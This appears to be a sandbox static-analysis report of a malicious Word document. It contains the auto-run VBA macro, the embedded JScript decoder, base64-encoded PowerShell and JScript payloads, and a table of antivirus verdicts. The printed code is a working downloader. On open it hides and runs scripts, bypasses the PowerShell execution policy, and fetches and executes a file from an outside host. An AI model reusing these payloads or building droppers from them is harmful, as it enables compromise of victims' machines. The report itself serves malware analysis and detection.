Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    With ActiveDocument
        s = "cmd /c cd /d %USERPROFILE% && type """ + .FullName + """ | findstr /r ""^var"" > y.js && wscript y.js """ + .FullName + """"
        n = Shell(s, vbHide)
        .Content.Font.ColorIndex = wdBlack
    End With
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    With ActiveDocument
        s = "cmd /c cd /d %USERPROFILE% && type """ + .FullName + """ | findstr /r ""^var"" > y.js && wscript y.js """ + .FullName + """"
        n = Shell(s, vbHide)
        .Content.Font.ColorIndex = wdBlack
    End With
End Sub

                                    
odWoJ=Wod
YLfsf?
rerZMer@
rgZM@3@
{naVI</
rXeXKe
|e9e9e
reXrKr
{naTG:/
reXeKe
lU>l>lU>
reXKX>
~qdY~L?
{dOdO8
h[NA4)
wbwbK4b
~phdphdphdphd\d
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
~{s:FXI
k>\lc`
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
MZn`v4
drs/downrev.xmlL
Cd$n,)
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
}v\uw+
drs/downrev.xmlL
Cd$n,)
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
0p3nUn
RI-ksQ
drs/downrev.xmlL
.~dg;G
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
t`Js)2
drs/downrev.xmlL
.~dg;G
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
R"$WY%
{x="!q
xPB[I4
drs/downrev.xmlL
BhS)}Q
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlD
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
Y!WeUa
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlDOMk
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
FXR/)`
({T.$(5
L3fr$q
Z:(Q8[
drs/downrev.xmlL
]&e(kt&
a{:n.?
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlDOMk
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
(6tyP$
Y"kOfY
drs/downrev.xmlL
BhS)}Q
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlDOK
ST`BhR)}n
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
KQv&I[
3-(i>J
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlD
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
35hE"Ck%g
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlDO
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
3g.|xw
VX(Q8_
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlD
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
Gw!gRe:
U[gF[]
!Pd=t"
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlD
cke,%q
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
,_P[r%%
;J$k E
g\~.Y+0E
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
[Content_Types].xml
_rels/.rels
drs/shapexml.xml
drs/downrev.xmlD
MsPI]EZ
[Content_Types].xmlPK
_rels/.relsPK
drs/shapexml.xmlPK
drs/downrev.xmlPK
Normal.dotm
Microsoft Office Word
cmd /c cd /d %USERPROFILE% && type "5
" | findstr /r "^var" > y.js && wscript y.js "
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Customliz
With Act/
cm@d /c c
%USERPR
OFILE% &
& type "
"" + .Fu
ndstr /r!
EShell
(s, vbHi
.Con2t
lo@rIndex
w@dBlack
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Document_Open
Documentj
ActiveDocument
FullName
ShellV
vbHide
Content
ColorIndex
wdBlack:
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
! Offic
!G{2DF8
D04C-5BF
A-101B-BHDE5
Files\C ommon
crosoft
Shared\O
FFICE15\
MSO.DLL#
M 15.0
LibrXary
hisDocum@entG
ThisDocument
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
HelpFile=""
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="2C2E808F80E084E084E488E488"
DPB="81832D324A324ACDB6334A18D1014DFF55AAFCE8F55287CD9ABBE9424333B0EDA3338A8E"
GC="D6D47AD59A7FEE80EE80EE"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=26, 26, 1016, 558, Z
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function de(input) { output = ""; i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = key.indexOf(input.charAt(i++)); enc2 = key.indexOf(input.charAt(i++)); enc3 = key.indexOf(input.charAt(i++)); enc4 = key.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); }} while (i < input.length); return output; } try { argv = WScript.Arguments; sh = new ActiveXObject("WScript.Shell"); findit(argv(0), "\"^dHJ5I\"", "yy.js"); findit(argv(0), "\"^QWRkL\"", "y.ps1"); sh.Run("wscript.exe yy.js", 0); sh.Run("powershell.exe -ep bypass -f ./y.ps1", 0); function findit(input, pattern, output) { s = "cmd /c findstr /r " + pattern + " \"" + input + "\" > temp.txt";
sh.Run(s, 0); fs = new ActiveXObject("Scripting.FileSystemObject"); while (1) { WScript.Sleep(10); if (!fs.FileExists("temp.txt")) { continue; } f = fs.GetFile("temp.txt"); if (f.Size) { ts = f.OpenAsTextStream(1, -2); s = ts.ReadAll(); ts.Close(); break; }} f = fs.OpenTextFile(output, 2, true); f.Write(de(s)); f.Close();
fs.DeleteFile("temp.txt"); }} catch (e) {}
QWRkLVR5cGUgLVR5cGVEZWZpbml0aW9uIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5UZXh0Ow0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBOYXRpdmVBUElzDQogICAgew0KICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gdWludCBXaW5FeGVjKHN0cmluZyBzdHJDbWRMaW5lLCB1aW50IHVDbWRTaG93KTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1cmxtb24uZGxsIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSwgQ2hhclNldCA9IENoYXJTZXQuQXV0byldDQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGxvbmcgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHBDYWxsZXIsIHN0cmluZyBzdHJVUkwsIHN0cmluZyBzdHJGaWxlTmFtZSwgdWludCB1UmVzZXJ2ZWQsIEludFB0ciBwQ2FsbEJhY2spOw0KICAgIH0NCiJADQoNCiRzdHJVUkwgPSAiaHR0cDovL3JvbWFub3Zhd2lsbGtpbGx5b3UuYzEuYml6L2luZGV4LnBocD91c2VyX2lkPTQxNyI7DQokc3RyUGF0aCA9IFtFbnZpcm9ubWVudF06OkV4cGFuZEVudmlyb25tZW50VmFyaWFibGVzKCIlVEVNUCUiKTsNCltJTy5EaXJlY3RvcnldOjpTZXRDdXJyZW50RGlyZWN0b3J5KCRzdHJQYXRoKTsNCiRzdHJGaWxlTmFtZSA9IFtJTy5QYXRoXTo6R2V0VGVtcEZpbGVOYW1lKCk7DQokblJlc3VsdCA9IFtOYXRp
dHJ5IA0Kew0KCXNoID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCglzaC5DdXJyZW50RGlyZWN0b3J5ID0gc2guRXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIlVEVNUCUiKTsNCgkNCglmcyA9IG5ldyBBY3RpdmVYT2JqZWN0KCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIpOwkJDQoJd2hpbGUgKDEpDQoJew0KCQlXU2NyaXB0LlNsZWVwKDEwKTsNCgkJDQoJCWlmICghZnMuRmlsZUV4aXN0cygiY2hlY2suYmF0IikpDQoJCXsNCgkJCWNvbnRpbnVlOw0KCQl9DQoJCQ0KCQlmID0gZnMuR2V0RmlsZSgiY2hlY2suYmF0Iik7DQoJCWlmIChmLlNpemUpDQoJCXsNCgkJCXRzID0gZi5PcGVuQXNUZXh0U3RyZWFtKDEsIC0yKTsNCgkJCXMgPSB0cy5SZWFkQWxsKCk7DQoJCQl0cy5DbG9zZSgpOw0KCQkJYnJlYWs7DQoJCX0JCQ0KCX0JDQoJDQoJc2guUnVuKCJjaGVjay5iYXQiLCAwKTsNCglmcy5EZWxldGVGaWxlKFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUpOw0KfQ0KY2F0Y2ggKGUpIHt9
, 2021
2019
2019
2020
2020
2020
2020
2020
1
2020
2020
2020
2020
2019
1 768,2
(+7,0%
2018
1 734,6
(+7,8%),
33,6
(-22,4%).
2020
1 265,2
(-19,3%),
1 230,9
(-20,0%),
12,7%
34,3
2020
1 457,2
1 399,9
19,1%
57,2
COVID-19
2019
2021
2019
2021-2025
2021-2025
2020
2019
2020
2019
-4,
2020
2020
2021
2019
50-600
23,5%).
28
2018
2021
L 410 UVP-E20, L410NG,
570
-2021
14
2019
329,
2020
2020
2022-2025
2021
2021
2021
2021
13.5
1995
1994
2021
-390945.
16
1995
2020-2022
1968-1990
2003
1:2 500 000
2020/2021
2021
2021
2018-2020
2021-2023
10.2.
COVID-19,
COVID-19,
2020
2009
2926,4
71,7
445,2
2012
2021
2021
2021
PAGE
PAGE
PAGE
PAGE
Normal
Heading 1
Default Paragraph Font
Table Normal
No List
Heading 1 Char
Body Text
Body Text Char
List Paragraph
Table Paragraph
Header
Header Char
Footer
Footer Char
"Text Box 22
"Text Box 21
"Text Box 20
"Text Box 19
"Group 17
Freeform 3
"Group 15
Freeform 5
"Group 13
Freeform 7
"Group 11
Freeform 9
"Group 9
Freeform 11
"Group 7
Freeform 13
"Group 5
Freeform 15
"Group 3
Freeform 17
"Group 1
Freeform 19
Unknown
Times New Roman
Symbol
Calibri
Cambria Math
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
_VBA_PROJECT
PROJECTwm
(1Normal.ThisDocument
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\Program Files\Microsoft Office\Office15\MSWORD.OLB#Microsoft Word 15.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL#Microsoft Office 15.0 Object Library
ThisDocument
0362f770df
ThisDocument
tThisDocument
PROJECT
CompObj
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.SDrop.b!c
Elastic malicious (high confidence)
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec Trojan.Gen.2
ESET-NOD32 a variant of Generik.JKVCGVL
TrendMicro-HouseCall TROJ_FRS.VSNTGU21
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan-Dropper.MSOffice.SDrop.gen
BitDefender Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb W97M.Dropper.106
Zillya Clean
TrendMicro TROJ_FRS.VSNTGU21
McAfee-GW-Edition BehavesLike.OLE2.Downloader.cl
FireEye Clean
Emsisoft Clean
SentinelOne Static AI - Malicious OLE
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Trojan:Script/Woreflint.A!cl
Gridinsoft Clean
Arcabit Clean
ViRobot DOC.Z.Agent.895425
ZoneAlarm Clean
GData Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/W97M.Obfus.Gen.8
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.SuspectCRC
MaxSecure Clean
Fortinet VBA/Agent.JKV!tr
BitDefenderTheta Clean
AVG Other:Malware-gen [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.